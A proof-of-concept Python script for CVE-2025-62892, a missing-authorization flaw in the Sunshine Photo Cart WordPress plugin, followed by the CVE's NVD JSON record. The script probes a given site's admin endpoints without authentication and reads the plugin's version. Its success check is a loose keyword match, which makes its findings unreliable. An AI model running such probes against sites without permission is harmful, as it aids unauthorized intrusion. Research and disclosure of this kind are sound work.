CVE-2025-62892

# CVE-2025-62892 PoC - Sunshine Photo Cart Missing Authorization # This PoC demonstrates accessing admin functionality without proper authorization import requests import sys def check_vulnerability(target_url): """ Check if target is vulnerable to CVE-2025-62892 Missing Authorization in Sunshine Photo Cart plugin """ # Target WordPress site with Sunshine Photo Cart plugin target = target_url.rstrip('/') # Vulnerable endpoints that may be accessible without authorization # These are typical Sunshine Photo Cart AJAX endpoints vulnerable_endpoints = [ f"{target}/wp-admin/admin-ajax.php", f"{target}/wp-admin/admin.php?page=sunshine", ] print(f"[*] Testing target: {target}") print(f"[*] CVE-2025-62892 - Sunshine Photo Cart Missing Authorization\n") for endpoint in vulnerable_endpoints: try: # Send request without authentication response = requests.get(endpoint, timeout=10, allow_redirects=False) print(f"[+] Endpoint: {endpoint}") print(f" Status Code: {response.status_code}") # Check if response indicates successful access if response.status_code == 200: # Check response content for signs of unauthorized access if 'sunshine' in response.text.lower() or 'gallery' in response.text.lower(): print(f" [!] Potential unauthorized access detected!") print(f" Response length: {len(response.text)} bytes\n") else: print(f" Response received but content unclear\n") elif response.status_code == 302: print(f" Redirect to: {response.headers.get('Location', 'Unknown')}\n") else: print(f" Access blocked or redirected\n") except requests.exceptions.RequestException as e: print(f"[-] Error accessing {endpoint}: {str(e)}\n") print("[*] Note: This is a basic PoC. For full exploitation,") print("[*] specific parameter manipulation may be required based on") print("[*] the exact vulnerable function in the plugin.\n") # Check plugin version if accessible try: readme_url = f"{target}/wp-content/plugins/sunshine-photo-cart/readme.txt" resp = requests.get(readme_url, timeout=10) if resp.status_code == 200 and 'sunshine' in resp.text.lower(): print(f"[+] Plugin readme found - checking version...") for line in resp.text.split('\n'): if 'stable' in line.lower() or 'version' in line.lower(): print(f" {line.strip()}") except: pass if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve_2025_62892_poc.py <target_url>") print("Example: python cve_2025_62892_poc.py http://example.com") sys.exit(1) target_url = sys.argv[1] check_vulnerability(target_url)

{"cve": {"id": "CVE-2025-62892", "sourceIdentifier": "[email protected]", "published": "2025-10-27T02:15:48.140", "lastModified": "2026-04-27T18:16:27.780", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in sunshinephotocart Sunshine Photo Cart sunshine-photo-cart allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects Sunshine Photo Cart: from n/a through <= 3.5.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/sunshine-photo-cart/vulnerability/wordpress-sunshine-photo-cart-plugin-3-5-3-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}